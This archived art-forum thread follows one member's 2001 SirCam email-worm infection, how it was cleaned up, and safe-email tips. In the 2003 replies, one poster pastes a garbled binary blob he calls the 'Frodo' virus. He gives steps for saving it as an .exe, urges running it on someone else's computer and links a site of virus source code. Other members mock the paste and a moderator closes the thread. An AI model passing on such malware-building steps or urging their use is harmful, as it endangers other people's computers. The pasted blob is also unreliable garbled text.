PDA

View Full Version : Virus?


llis
08-05-2001, 09:26 AM
O.k. .... my computer now has a virus.

Guess I thought I was being pretty virus savy.... but this virus came to me in an email and did not look strange to me at all.

It's SIRC32.EXE which came to me in a word document.

My McAfee caught it, but I can't get rid of it. When I try to update my dat files, it just says that it can't find the files to open with.

Wonder what to do now?

Midwest Painter
08-05-2001, 10:18 AM
Originally posted by llis
O.k. .... my computer now has a virus.

Guess I thought I was being pretty virus savy.... but this virus came to me in an email and did not look strange to me at all.

It's SIRC32.EXE which came to me in a word document.

My McAfee caught it, but I can't get rid of it. When I try to update my dat files, it just says that it can't find the files to open with.

Wonder what to do now?

When in doubt, always visit your http://www.mcaffee.com website. I've looked-up your computer virus. A nasty one at that. Here is the information you need:

http://www.mcafee.com/anti-virus/viruses/sircam/default.asp?cid=2360

llis
08-05-2001, 11:28 AM
Did that when my McAfee found the virus this morning and since I have McAfee Clinic on line, the virus was removed at once....but still says sirc32.exe is missing when I try to run word, excel, etc.

Folks.... this email was sent to me and it looks just as ordinary as any other I have ever gotten. As a matter of fact, I opened this email because it looked like a new member of WetCanvas wanting me to see her work. It was a document file, so I opened it.

If I understand this virus.... it will try to send others messages possibly using my address book. I have no control over it. :(

I am connected via cable 24/7 and have a fire wall. At the present time, my fire wall has been disabled (not by me...and I can't get it to work now because it says sirc32.exe is missing) and most important.......

.... ALL OF MY BUSINESS FILES ARE GONE!!!!!!! all the spreadsheets, word documents....everything. I can not even open these programs at all. :(

I'm leaving this message to say that even though McAfee did catch the virus and a scan of my computer says that my computer is no longer infected, I have lost valuable documents. Don't want this to happen to anyone else! If you get a message that looks remotely like it might be this virus ....don't open, just delete.

Midwest Painter
08-05-2001, 12:29 PM
Originally posted by llis
Did that when my McAfee found the virus this morning and since I have McAfee Clinic on line, the virus was removed at once....but still says sirc32.exe is missing when I try to run word, excel, etc.

Folks.... this email was sent to me and it looks just as ordinary as any other I have ever gotten. As a matter of fact, I opened this email because it looked like a new member of WetCanvas wanting me to see her work. It was a document file, so I opened it.

If I understand this virus.... it will try to send others messages possibly using my address book. I have no control over it. :(

I am connected via cable 24/7 and have a fire wall. At the present time, my fire wall has been disabled (not by me...and I can't get it to work now because it says sirc32.exe is missing) and most important.......

.... ALL OF MY BUSINESS FILES ARE GONE!!!!!!! all the spreadsheets, word documents....everything. I can not even open these programs at all. :(

I'm leaving this message to say that even though McAfee did catch the virus and a scan of my computer says that my computer is no longer infected, I have lost valuable documents. Don't want this to happen to anyone else! If you get a message that looks remotely like it might be this virus ....don't open, just delete.


Are your files physicall "gone" or is it that you just can't read them? Go to the Windows Explorer and see if there are still present.

llis
08-05-2001, 12:52 PM
Whew!!!!!!

What a mess.

This is what happened. My McAfee clinic caught the virus ...this is true... and it did not show again when I did a rescan of my computer. However, I could not get to any of my programs because it kept telling me that a file was missing.

So.... I went back to McAfee and did the "manual remove steps".

This worked!!!! Thank goodness, but it did take me a better part of two hours to read all the stuff and then do all the steps.

My programs are all back...and it looks like all my files are there. I can't tell you what a panic I was in.

Thanks Midwest for reminding me that I needed to look further.

All appears to be well now. Now I am worried about all the folks I have in my address book that might not see this message. :(

TPS
08-05-2001, 03:40 PM
This virus or another similar, works through your email. It not only does a number on your machine, but also sends itself to everyone in your address book. It usually arrives from someone you know (the address book angle) and is asking for help with something. When you open, it goes to work.

I received it from my nephew. But, was already aware of it, and deleted it immediately. You need to notify everyone in your address book to be on the lookout for it. Their's will appear to come from you.

llis
08-05-2001, 04:32 PM
Thanks TPS

Unfortunately, I think the damage may have already been done. I was hoping that some might see this message here on this message board and recognize the virus as such before opening.

The email that came to me was from someone I did not know by looking at the email address. :(

There is a good chance that the virus might have done its work before the Mcafee program cleared. Don't know.

I did send my husband an email and he did not receive the virus.

My computer is clean now, but it was an awful morning.

Midwest Painter
08-05-2001, 07:48 PM
To avoid computer viruses always remember to practice safe hex.

;)

pixelscapes
08-15-2001, 03:22 PM
1) This is why I always use web-based email. It doesn't open attachments unless I tell it to, and I have it set to not read HTML either.

2) NEVER EVER EVER EVER open a Word or other Microsoft Office file you receive through email! Ever! And don't open any .EXE. files either. Basically you should only open standard text files or image types that you recognize.... yes, even if it's from somebody you know. If somebody REALLY wants to show you something, they can send you the images or the plain text (non-Word format). Or, they can send you to a website.

For more information about the worm she got ("SirCam"), check this link: http://www.cert.org/advisories/CA-2001-22.html

-=- Jen "Just wait till we get JPG viruses!" de la Cruz

Kevin M
08-15-2001, 07:23 PM
Good advice, Pixelscapes.

I remember an exasperated computer bug fixer dispensing more or less the same advice some years ago when the email pests first started doing the rounds. He added that it was a fair bet that if he sent an attachment to all sundry entitled 'FORMAT C:', a good number of them would be immediately opened.

Kevin

Victor
09-09-2001, 07:49 AM
While we are on the subject of viruses via the e-mail, can anyone tell me how you go about deleting a message in outlook express without opening it first because I cant do anything with a message unless I highlight it first and then its too late as it opens.

Victor...

Kevin M
09-09-2001, 08:43 AM
Hi Victor

Looks like you have mouse clicks in your Explorer Folder options configured to open a file on a single click instead of a double click. Single click is usually for highlighting only.

Kevin

Victor
09-09-2001, 12:16 PM
Hi Kevin,
I've searched my explorer options but can not find any reference to mouse clicks.
I'm using internet explorer 5.05 with outlook express. I can't find any references to mouse clicks in outlook express either

Victor....

OK, I found it and its set to
double click to open an item and single click to select but even so, in order to delete a message I still have to single click on the upper pane and as soon as I do that, the message opens in the lower pane

Kevin M
09-09-2001, 06:36 PM
Hi Victor,

I'm not sure how it works in Outlook Express but in Outlook under View you uncheck the Preview Pane tab. This gives you just a list of emails that you can individually highlight and delete without them opening in a preview.

Kevin

Victor
09-09-2001, 06:55 PM
Thanks Kevin,

I unchecked the preview pane and that did the trick

Victor............

HKRS CLAN
06-25-2003, 06:03 PM
i have a copy of the sicram virus...and i am studying it.....
SENDING a virus isnt illegal if the person is not using it for destruction.....only for study and education

madster
06-26-2003, 08:36 AM
The advice about not blindly OPENING attachments is the key. If you keep Previews OFF, Double Click ON, and have a good anti-virus, such as Norton, or McAfee, you SAVE the attachment (which is like putting it in a cage), and then SCAN it with your anti-virus, (which you keep UP TO DATE by turning Auto Update ON).

Safe Hex is like safe sex. It only takes a little extra effort, but the results are carefree if you do, and disasterous if you don't.

captan
06-26-2003, 08:50 AM
Never had a virus for the about 10 years I've had computers. Never even used a virus app. The most common viruses are built on backdoors in Microsoft software and as I don't have any MS software - I'm not affected by it. Thank god I have a mac.

HKRS CLAN
06-26-2003, 07:28 PM
GUESS WHICH FILE TYPE I SHOULD SAVE THE FOLLOWING CODE IN TO SCREW SOMEONE UP!??:::*fill in the ?'s

901.E?E
here's the code of the day!!-->"FRODO"
ul = t,  = t, = t$ = :UP~ s .G9FvX].>Pt2F./F.-rX]..&.! f.!.Qufl
4
.1 S
V32D^.[ .0!..ER!&G.G& .I13!-/P # X
P!!R-X%P!1m>->57KLNl K&! 6 ! &E EE. a. +J!J!Jڀ> Zt..> t M -aУ B& Z.6I& & `B P.EJ! .N R 3E&
 . .> u$. . . .6E P.. .. .& .. w3 YuȻ  P P0|#N7K<=>U!'YYNO?
@ B
WA
H4= Ku.Uv.]U



S.:'u ._^Ãr[
!.!.Q.P

P.
PX]..5
V
r

]U.6F]w
5
uA
 ?uG. Gto.> u o _ :
5



uGtoȁo _ ڋw! w#u
ڋG
G u?s0
FNRtGGtZ% 󤿵EU %EU- E!U#E  ״'I
H% R.
)
^t~.  3.I AD#D!.&+ s . Guo _ oQt/Y .> tr ش> .FY]r9.> t1Zt).R 3.&E&]&^.&DR .u&;]&u&E ./

tNR.$.&.6$ ^P }]...K.5s ..6.6.6U.$?nR .u
&E ..6u3 Q^.6 . .6 ."DDt` ..Qh-Vێ.6.6.6
 
"X..&..\DD<t(..$.&.$&wrn.&t#DDuE\DD, 1.&W &G &G &G .F
F . *
 r"|0  > MZt> ZMt tX ;rH
  t?  t@>tb +  @ s:  С С t   e أg >C W7)+ B3ɋ%?  B3ɋ? B3ɋ %+ ø B3ɋ@  ʋи B3ҹ ϴ@W)+ƀu>r> tS(2.G[
 P 3 }:u.(E%E$. <t . <u|wSQ.[ER.(6Z u= @rC Cr;3ɸC.> u)=r!؋ϸCS.(2G.[3KQRP D€t WƀXZYB33..B33p.. B..W
u".&Cr ƀt.<u7.&ƀtjtF. <uOt n ^ j.&8t... @..-  .+.yF bu;w... uv..?.Fx.>r3ߋ..  Ѓ B8 ++δ?.'..).3ɺ B
z.&Su
... X..-  .+.x~   B  ? B3ɋ  @ B|@3u Bg Waƀt ȸWS(u;wy.. uwcj(8 Wƀu ȸW.A.C..&.> u.6.-s...A2.. -/9;
= s= sP&@
Pp 3OWXP!!3.-1S I$==? $4{ .9#.=$` ø 3.32 .3 .PSQRVW.&.>5K &DG._^ZY[X.&.]
.]
.Y.&W.&[.].&[.Y.&Wðt.1.3# i .> tHuC`G r;;r I8 ,J BڎP.N3 H.I& P.{.53м |O À$@$@$@!$@À DpDDDp(( p <t 3 |  s۫Muà Y|rܴ|U !3۹ Iu 3C
  Ϲ( & Ǟ   Ǟ 6|6|(6|(Ã
|CS3ێÊ&&_[ 2  u 3p PP3p 3.WI IP

Christie
06-26-2003, 07:37 PM
macs are not immune to viruses. It is just that they make up such a small percentage of the population that it is hardly worth the trouble to write something for them. :)

By the way, we are a mac household as well. Everything, but my laptop is microsoft free and I do not use my MS apps all that frequently.

Even with macs, we run up to date virus software, but we are both professional paranoids. :D

HKRS CLAN
06-26-2003, 07:46 PM
thats correct christie!
macs are not at all immune in any way shape or form...
1. they use scripts that include commands
such as delete insert command edit write
just as ms does they
have files
that can contain macro viruses
and network virii

i should know i write viruses! :evil: ;) :) :D

loydb
06-27-2003, 07:42 AM
Man, it's a shame what google drags in.

Hint: What you posted wasn't code. If you're going to try and post binaries to a text forum, at least have the sense to UUENCODE it or something...

loyd

http://www.wetcanvas.com/Community/images/27-Jun-2003/20002-h4x0rzsmall.jpg

Christie
06-27-2003, 08:53 AM
:D

HKRS CLAN
06-28-2003, 11:09 PM
the "code" i gave has pasted into a notepad and then
>>"save as"
in the file name box: FILENAME.exe

in the file type box: "all files (*.*)"

i prefer i it were saved..save it as 901.exe that way i know it'll work

it'll only open when opened manually---if not edited by you
(heh....just try to edited it!! lol! ) :D

now you know how to put together "FRODO" an application virus for exe files.... i suggest you try it out on someone who has an extra computer with

windows95

up to

xp plus

HKRS CLAN
06-28-2003, 11:15 PM
if you want to download "safe" ...

(if your smart enough not to open it yourself!)

...virus source codes for marco virii and
application viruses (.exe .com)

go to:

http://www.davidsonlinegallery.com/networkpunk/viruses/main.htm

scottb
06-29-2003, 10:08 AM
This is an art board, not a virus board. If you want to share viruses, or other information, go to astalavista, or nuke, and find a place to do that.

Closing this thread.